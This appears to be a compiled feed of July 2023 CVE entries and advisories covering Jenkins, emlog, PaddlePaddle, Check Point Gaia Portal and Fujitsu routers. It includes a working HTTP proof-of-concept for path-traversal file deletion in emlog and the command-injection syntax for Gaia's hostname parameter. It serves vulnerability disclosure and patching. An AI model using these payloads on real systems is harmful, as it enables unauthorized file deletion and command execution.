Jenkins 2.415 and earlier, LTS 2.401.2 and earlier does not sanitize or properly encode URLs in build logs when transforming them into hyperlinks, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control build log contents.

This advisory announces vulnerabilities in the following Jenkins deliverables:

*   Jenkins (core)
*   Bazaar Plugin
*   Chef Identity Plugin
*   GitLab Authentication Plugin
*   Gradle Plugin
*   Qualys Web App Scanning Connector Plugin
*   ServiceNow DevOps Plugin

**Descriptions****Stored XSS vulnerability**

**SECURITY-3188 / CVE-2023-39151**  
**Severity (CVSS):** High  
**Description:**

Jenkins applies formatting to the console output of builds, transforming plain URLs into hyperlinks.

Jenkins 2.415 and earlier, LTS 2.401.2 and earlier does not sanitize or properly encode URLs of these hyperlinks in build logs.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control build log contents.

Jenkins 2.416, LTS 2.401.3 encodes URLs of affected hyperlink annotations in build logs.

**Incorrect control flow in Gradle Plugin breaks credentials masking in the build log**

**SECURITY-3208 / CVE-2023-39152**  
**Severity (CVSS):** Medium  
**Affected plugin: gradle**  
**Description:**

Gradle Plugin 2.8 improperly invokes APIs available only on the controller from an agent when setting up build log annotations, causing an exception.

As a result, credentials may not be masked (i.e., replaced with asterisks) in the build log in some circumstances.

Gradle Plugin 2.8.1 improves the control flow and handles the exception, so that credentials masking is not affected.

An improvement in Pipeline: API 1232.v1679fa\_2f0f76 prevents issues like this from affecting credentials masking in the future. As of the publication of this advisory, the Jenkins security team is not aware of other plugins with a similar issue.

**CSRF vulnerability in GitLab Authentication Plugin**

**SECURITY-2696 / CVE-2023-39153**  
**Severity (CVSS):** Medium  
**Affected plugin: gitlab-oauth**  
**Description:**

GitLab Authentication Plugin 1.17.1 and earlier does not implement a state parameter in its OAuth flow, a unique and non-guessable value associated with each authentication request.

This vulnerability allows attackers to trick users into logging in to the attacker’s account.

GitLab Authentication Plugin 1.18 implements a state parameter in its OAuth flow.

**CSRF vulnerability and missing permission check in ServiceNow DevOps Plugin allow capturing credentials**

**SECURITY-3129 / CVE-2023-3414 (CSRF), CVE-2023-3442 (missing permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: servicenow-devops**  
**Description:**

ServiceNow DevOps Plugin 1.38.0 and earlier does not perform a permission check in a method implementing form validation.

This allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

Additionally, this form validation method does not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

ServiceNow DevOps Plugin 1.38.1 requires POST requests and Overall/Administer permission for the affected form validation method.

**Incorrect permission checks in Qualys Web App Scanning Connector Plugin allow capturing credentials**

**SECURITY-3012 / CVE-2023-39154**  
**Severity (CVSS):** Medium  
**Affected plugin: qualys-was**  
**Description:**

Qualys Web App Scanning Connector Plugin 2.0.10 and earlier does not correctly perform permission checks in several HTTP endpoints.

This allows attackers with global Item/Configure permission to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

Qualys Web App Scanning Connector Plugin 2.0.11 requires the appropriate permissions for the affected HTTP endpoints.

**Secret displayed without masking by Chef Identity Plugin**

**SECURITY-3192 / CVE-2023-39155**  
**Severity (CVSS):** Low  
**Affected plugin: chef-identity**  
**Description:**

Chef Identity Plugin stores the user.pem key in its global configuration file io.chef.jenkins.ChefIdentityBuildWrapper.xml on the Jenkins controller as part of its configuration.

While this key is stored encrypted on disk, in Chef Identity Plugin 2.0.3 and earlier the global configuration form does not mask the user.pem key form field, increasing the potential for attackers to observe and capture it.

**CSRF vulnerability in Bazaar Plugin**

**SECURITY-3095 / CVE-2023-39156**  
**Severity (CVSS):** Medium  
**Affected plugin: bazaar**  
**Description:**

Bazaar Plugin 1.22 and earlier does not require POST requests for an HTTP endpoint, resulting in a cross-site request forgery (CSRF) vulnerability.

This vulnerability allows attackers to delete previously created Bazaar SCM tags.

**Severity**

*   SECURITY-2696: Medium
*   SECURITY-3012: Medium
*   SECURITY-3095: Medium
*   SECURITY-3129: Medium
*   SECURITY-3188: High
*   SECURITY-3192: Low
*   SECURITY-3208: Medium

**Affected Versions**

*   **Jenkins weekly** up to and including 2.415
*   **Jenkins LTS** up to and including 2.401.2
*   **Bazaar Plugin** up to and including 1.22
*   **Chef Identity Plugin** up to and including 2.0.3
*   **GitLab Authentication Plugin** up to and including 1.17.1
*   **Gradle Plugin** up to and including 2.8
*   **Qualys Web App Scanning Connector Plugin** up to and including 2.0.10
*   **ServiceNow DevOps Plugin** up to and including 1.38.0

**Fix**

*   **Jenkins weekly** should be updated to version 2.416
*   **Jenkins LTS** should be updated to version 2.401.3
*   **GitLab Authentication Plugin** should be updated to version 1.18
*   **Gradle Plugin** should be updated to version 2.8.1
*   **Qualys Web App Scanning Connector Plugin** should be updated to version 2.0.11
*   **ServiceNow DevOps Plugin** should be updated to version 1.38.1

These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.

As of publication of this advisory, no fixes are available for the following plugins:

*   Bazaar Plugin
*   Chef Identity Plugin

Learn why we announce these issues.

**Credit**

The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities:

*   **Alvaro Muñoz (@pwntester), GitHub Security Lab** for SECURITY-3129
*   **Andrea Chiera, CloudBees, Inc.** for SECURITY-3192
*   **Kevin Guerroudj, CloudBees, Inc.** for SECURITY-3095
*   **Kevin Guerroudj, CloudBees, Inc. and Devin Nusbaum, CloudBees, Inc.** for SECURITY-3188
*   **Wadeck Follonier, CloudBees Inc.** for SECURITY-2696
*   **Yaroslav Afenkin, CloudBees, Inc.** for SECURITY-3012

CVE-2023-39151: Jenkins Security Advisory 2023-07-26

emlog 2.1.9 is vulnerable to Arbitrary file deletion via admin\template.php.

First log in to the home page of the background using the administrator account  
Open the admin\\template.php template

**../../hello.txt** This location is the root directory file to be deleted

poc:  
GET /emlog/admin/template.php?action=del&tpl=**../../hello.txt**&token=c5bc68077f6da2a911df58e6cde92cbc2d0514fd HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,_/_;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
DNT: 1  
Connection: close  
Referer: http://127.0.0.1/emlog/admin/template.php  
Cookie: PHPSESSID=kqfrmmnndterp04rl0cv9ls613; EM\_AUTHCOOKIE\_RNrgNg46hg86lUoT8Hg8Vht92Y3yU9rn=123123%7C0%7Cf98ccd4c0c66a0922a0e077a24088ba0  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1

CVE-2023-37049: emlogcms has an arbitrary file deletion vulnerability · Issue #1 · Num-Nine/CVE

PaddlePaddle before 2.5.0 has a command injection in fs.py. This resulted in the ability to execute arbitrary commands on the operating system.


*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-38673: Paddle/security/advisory/pdsa-2023-005.md at develop · PaddlePaddle/Paddle

FPE in paddle.trace in PaddlePaddle before 2.5.0. This flaw can cause a runtime crash and a denial of service.


CVE-2023-38672: Paddle/security/advisory/pdsa-2023-004.md at develop · PaddlePaddle/Paddle

Heap buffer overflow in paddle.trace in PaddlePaddle before 2.5.0. This flaw can lead to a denial of service, information disclosure, or more damage is possible.


CVE-2023-38671: Paddle/security/advisory/pdsa-2023-003.md at develop · PaddlePaddle/Paddle

Null pointer dereference in paddle.flip in PaddlePaddle before 2.5.0. This resulted in a runtime crash and denial of service.


CVE-2023-38670: Paddle/security/advisory/pdsa-2023-002.md at develop · PaddlePaddle/Paddle

Local user may lead to privilege escalation using Gaia Portal hostnames page.

Pentests.nl has discovered a vulnerability in Check Point Gaia Portal which allows an authenticated user with write permissions on the DNS settings to inject commands in a cgi script to get remote code execution on the operating system.

****About Check Point Gaia Portal****

Gaia is a unified security Operating System that combines the best of Check Point original operating systems, and IPSO, the operating system from appliance security products. Gaia is available for all Check Point Security Appliances and Open Servers.

Gaia Portal is an advanced, web-based interface for Gaia platform configuration. You can do almost all system configuration tasks through this Web-based interface.

****Overview****

The parameter hostname in the web request /cgi-bin/hosts\_dns.tcl is vulnerable for command injection. This can be exploited by any user with a valid session, as long as the user has write permissions on the DNS settings. The injected commands are executed by the user ‘Admin’.

****Analysis****

The vulnerability was discovered during one of our routine web application pentests. During each pentest, we treat every input field as potentially vulnerable. Improper use of user input can lead to various types of injection vulnerabilities. Therefore, we often test input fields for various types of injections, such as SQL injection, Cross-Site Scripting, Template Injection, xxx injection, and Command Injection. The latter, Command Injection, is what is happening here.

By appending the following sequence behind the value of the hostname parameter: |\`command here\`, the command is executed. We discovered this during a grey box pentest, without inspecting the code.

If we do inspect the code, we see the following.

cat /web/cgi-bin2/hosts\_dns.tcl

If it is a POST request, all variables are passed through an if elseif. We pass a total of 3 parameters: hostname, domainname, and save. With the hostname parameter, the value machine: hostname _<hostname\_value>_ is added to the set\_list list. The other parameter we pass in the web request is domainname, which adds the value domainname _<domainname\_value>_ to the list. Our last parameter, save, is set to true, which adds the value :save to the set\_list list. The final value of the set\_list list is:

Next, the line with set cmd \[concat \[list libdb set $myDb -list \] $set\_list\] is executed. Here, the variable cmd is assigned the following value:

In the subsequent line, catch is invoked with the value of the cmd list. catch executes a program/process and returns the exit code.

Down the chain, the input is used to modify the hostname. The input is used as is, without first sanitizing it. This makes it possible to specify an additional command using the pipe character and a backtick, which is then executed alongside the valid\_token\_checker process.

The vulnerability could be leveraged to gain access to the server, as can be seen in the following gif.

****Impact****

Successful exploitation allows an authenticated attacker to execute commands on the operating system.

CVSS score: _8.4 High_  
CVSS string: 3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

****Remediation****

Update to the latest version. JHF releases should be available for all affected versions by now. Detailed steps on how to update can be found here.

****Disclosure timeline****

08 Mar 2023 – Bug discovered, initial report to Check Point team  
09 Mar 2023 – Vulnerability acknowledgement by Check Point  
23 Mar 2023 – Check Point created a fix and getting it ready for release  
03 Apr 2023 – Private fix was released  
April/May/June 2023 – Public JHF releases for all affected versions  
July 2023 – Full disclosure

****References****

https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit\_doGoviewsolutiondetails=&solutionid=sk92449&partition=Basic&product=Multi-Domain

https://support.checkpoint.com/results/sk/sk181311

CVE-2023-28130: CVE-2023-28130 - Command Injection in Check Point Gaia Portal

CVE-2023-28130: Support, Support Requests, Training, Documentation, and Knowledge base for Check Point products and services

Use after free in paddle.diagonal in PaddlePaddle before 2.5.0. This resulted in a potentially exploitable condition.


CVE-2023-38669: Paddle/security/advisory/pdsa-2023-001.md at develop · PaddlePaddle/Paddle

Authentication bypass vulnerability in Fujitsu network devices Si-R series and SR-M series allows a network-adjacent unauthenticated attacker to obtain, change, and/or reset configuration settings of the affected products. Affected products and versions are as follows: Si-R 30B all versions, Si-R 130B all versions, Si-R 90brin all versions, Si-R570B all versions, Si-R370B all versions, Si-R220D all versions, Si-R G100 V02.54 and earlier, Si-R G200 V02.54 and earlier, Si-R G100B V04.12 and earlier, Si-R G110B V04.12 and earlier, Si-R G200B V04.12 and earlier, Si-R G210 V20.52 and earlier, Si-R G211 V20.52 and earlier, Si-R G120 V20.52 and earlier, Si-R G121 V20.52 and earlier, and SR-M 50AP1 all versions.

Published:2023/07/26  Last Updated:2023/07/26

**Overview**

Multiple network devices Si-R series and SR-M series provided by Fujitsu Limited contain an authentication bypass vulnerability.

**Products Affected**

*   Si-R series
    *   Si-R 30B all versions
    *   Si-R 130B all versions
    *   Si-R 90brin all versions
*   Si-R V35 series
    *   Si-R570B all versions
    *   Si-R370B all versions
    *   Si-R220D all versions
*   Si-RG V2 series
    *   Si-R G100 V02.54 and earlier
    *   Si-R G200 V02.54 and earlier
*   Si-RG V4 series
    *   Si-R G100B V04.12 and earlier
    *   Si-R G110B V04.12 and earlier
    *   Si-R G200B V04.12 and earlier
*   Si-RG V20 series
    *   Si-R G210 V20.52 and earlier
    *   Si-R G211 V20.52 and earlier
    *   Si-R G120 V20.52 and earlier
    *   Si-R G121 V20.52 and earlier
*   SR-M series
    *   SR-M 50AP1 all versions

**Description**

The web management interface of Fujitsu network devices Si-R series and SR-M series contains an authentication bypass vulnerability (CWE-287、CVE-2023-38555).

**Impact**

An attacker who can access the product may obtain the product's configuration information or change/reset the configuration settings.

**Solution**

**Update the firmware**  
Update firmware to the latest version according to the information provided by the developer.  
The developer plans to publish updates for Si-RG V2 series, Si-RG V4 series, and Si-RG V20 series in August 2023.

**Apply the workarounds**  
Applying the following workarounds may mitigate the impacts of this vulnerability.

*   Change the product's settings to disable HTTP/HTTPS functions
*   Do not use the web management interface of the affected products

To apply the workaround for Si-R 30B or Si-R 130B, the firmware must be updated to the following versions.

*   Si-R 30B V02.05
*   Si-R 130B V04.09

For the details, refer to the information provided by the developer.

**Vendor Status**

**References**

**JPCERT/CC Addendum**

**Vulnerability Analysis by JPCERT/CC**

CVSS v3 CVSS:3.0/AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L

Attack Vector(AV)

Physical (P)

Local (L)

Adjacent (A)

Network (N)

Attack Complexity(AC)

High (H)

Low (L)

Privileges Required(PR)

High (H)

Low (L)

None (N)

User Interaction(UI)

Required (R)

None (N)

Scope(S)

Unchanged (U)

Changed (C)

Confidentiality Impact(C)

None (N)

Low (L)

High (H)

Integrity Impact(I)

None (N)

Low (L)

High (H)

Availability Impact(A)

None (N)

Low (L)

High (H)

CVSS v2 AV:A/AC:H/Au:N/C:P/I:C/A:P

Access Vector(AV)

Local (L)

Adjacent Network (A)

Network (N)

Access Complexity(AC)

High (H)

Medium (M)

Low (L)

Authentication(Au)

Multiple (M)

Single (S)

None (N)

Confidentiality Impact(C)

None (N)

Partial (P)

Complete (C)

Integrity Impact(I)

None (N)

Partial (P)

Complete (C)

Availability Impact(A)

None (N)

Partial (P)

Complete (C)

**Credit**

Katsuhiko Sato (a.k.a. goroh\_kun) of 00One, Inc. reported this vulnerability to JPCERT/CC.  
JPCERT/CC coordinated with the developer.

**Other Information**

JPCERT Alert

  

JPCERT Reports

  

CERT Advisory

  

CPNI Advisory

  

TRnotes

  

CVE

CVE-2023-38555  

JVN iPedia

Source

CVE